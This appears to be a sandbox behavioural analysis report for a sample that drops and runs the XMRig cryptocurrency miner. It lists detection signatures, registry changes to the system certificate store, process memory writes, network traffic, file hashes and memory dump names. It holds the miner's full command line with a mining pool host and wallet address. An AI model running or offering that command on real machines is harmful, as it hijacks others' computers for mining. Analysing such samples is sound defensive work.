memory/3572-32-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-33-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-34-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-35-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-36-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-37-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-38-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-39-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-40-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-41-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-42-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-43-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-44-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-45-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-46-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-47-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-48-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-49-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-50-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-51-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-52-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-53-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-54-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-55-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-56-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-57-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-58-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-59-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-60-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-61-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-62-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-63-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-64-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-65-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-66-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-67-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-68-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-69-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-70-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-71-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-72-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-73-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-74-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-75-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-76-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-77-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-78-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-79-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-80-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-81-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-82-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-83-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-84-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:29
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 856 wrote to memory of 2672 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 856 wrote to memory of 2672 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4028,i,13281073920029625837,8253721632651544158,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=2364,i,13281073920029625837,8253721632651544158,262144 --variations-seed-version --mojo-platform-channel-handle=1408 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.246.116.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2672-16-0x0000021FF4050000-0x0000021FF4070000-memory.dmp
memory/2672-17-0x0000021FF40A0000-0x0000021FF40C0000-memory.dmp
memory/2672-18-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-20-0x0000021FF40C0000-0x0000021FF40E0000-memory.dmp
memory/2672-19-0x0000021FF40E0000-0x0000021FF4100000-memory.dmp
memory/2672-21-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-22-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-25-0x0000021FF40C0000-0x0000021FF40E0000-memory.dmp
memory/2672-24-0x0000021FF40E0000-0x0000021FF4100000-memory.dmp
memory/2672-23-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-26-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-27-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-28-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-29-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-30-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-31-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-32-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-33-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-34-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-35-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-36-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-37-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-38-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-39-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-40-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-41-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-42-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-43-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-44-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-45-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-46-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-47-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-48-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-49-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-50-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-51-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-52-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-53-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-54-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-55-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-56-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-57-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-58-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-59-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-60-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-61-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-62-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-63-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-64-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-65-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-66-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-67-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-68-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-69-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-70-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-71-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-72-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-73-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-74-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-75-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-76-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-77-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-78-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-79-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-80-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-81-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-82-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-83-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
memory/2672-84-0x00007FF6A8B20000-0x00007FF6A9623000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:31
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f